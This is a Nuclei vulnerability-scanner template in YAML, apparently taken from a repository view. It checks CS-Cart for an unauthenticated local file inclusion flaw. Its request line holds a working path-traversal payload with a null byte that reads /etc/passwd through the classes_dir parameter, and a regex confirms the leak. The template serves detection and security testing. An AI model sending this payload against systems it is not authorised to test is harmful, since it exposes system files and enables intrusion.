nuclei-templates/vulnerabilities/other/cs-cart-unauthenticated-lfi...

27 lines
651 B
YAML
Raw Normal View History

id: cs-cart-unauthenticated-lfi
info:
name: CS-Cart unauthenticated LFI
author: 0x_Akoko
severity: high
2021-10-19 09:56:40 +00:00
description: A vulnerability in CS-Cart allows remote unauthenticated attackers to access locally stored files and reveal their content.
reference:
- https://cxsecurity.com/issue/WLB-2020100100
tags: cscart,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
2021-09-22 12:38:32 +00:00
- "root:.*:0:0:"
- type: status
status:
- 200